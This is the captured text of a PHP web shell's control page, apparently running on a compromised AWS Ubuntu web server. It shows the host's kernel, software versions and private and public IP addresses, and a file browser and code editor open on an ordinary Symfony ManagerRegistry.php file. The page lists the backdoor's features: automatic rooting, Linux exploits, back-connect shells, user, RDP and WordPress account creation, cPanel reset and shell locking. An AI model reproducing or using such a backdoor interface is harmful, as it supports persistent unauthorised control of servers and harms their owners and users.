Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.143.110
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
doctrine-bridge /
[ HOME SHELL ]
Name
Size
Permission
Action
CacheWarmer
[ DIR ]
drwxrwxr-x
DataCollector
[ DIR ]
drwxrwxr-x
DataFixtures
[ DIR ]
drwxrwxr-x
DependencyInjection
[ DIR ]
drwxrwxr-x
Form
[ DIR ]
drwxrwxr-x
Logger
[ DIR ]
drwxrwxr-x
Messenger
[ DIR ]
drwxrwxr-x
PropertyInfo
[ DIR ]
drwxrwxr-x
SchemaListener
[ DIR ]
drwxrwxr-x
Security
[ DIR ]
drwxrwxr-x
Test
[ DIR ]
drwxrwxr-x
Validator
[ DIR ]
drwxrwxr-x
CHANGELOG.md
4.22
KB
-rw-rw-r--
ContainerAwareEventManager.php
5.08
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
ManagerRegistry.php
2.18
KB
-rw-rw-r--
README.md
461
B
-rw-rw-r--
composer.json
2.56
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ManagerRegistry.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bridge\Doctrine; use Doctrine\Persistence\AbstractManagerRegistry; use ProxyManager\Proxy\LazyLoadingInterface; use Symfony\Bridge\ProxyManager\LazyProxy\Instantiator\RuntimeInstantiator; use Symfony\Component\DependencyInjection\Container; /** * References Doctrine connections and entity/document managers. * * @author Lukas Kahwe Smith <smith@pooteeweet.org> */ abstract class ManagerRegistry extends AbstractManagerRegistry { /** * @var Container */ protected $container; /** * {@inheritdoc} * * @return object */ protected function getService($name) { return $this->container->get($name); } /** * {@inheritdoc} * * @return void */ protected function resetService($name) { if (!$this->container->initialized($name)) { return; } $manager = $this->container->get($name); if (!$manager instanceof LazyLoadingInterface) { throw new \LogicException('Resetting a non-lazy manager service is not supported. '.(interface_exists(LazyLoadingInterface::class) && class_exists(RuntimeInstantiator::class) ? sprintf('Declare the "%s" service as lazy.', $name) : 'Try running "composer require symfony/proxy-manager-bridge".')); } $manager->setProxyInitializer(\Closure::bind( function (&$wrappedInstance, LazyLoadingInterface $manager) use ($name) { if (isset($this->aliases[$name])) { $name = $this->aliases[$name]; } if (isset($this->fileMap[$name])) { $wrappedInstance = $this->load($this->fileMap[$name]); } else { $wrappedInstance = $this->{$this->methodMap[$name]}(false); } $manager->setProxyInitializer(null); return true; }, $this->container, Container::class )); } }
Close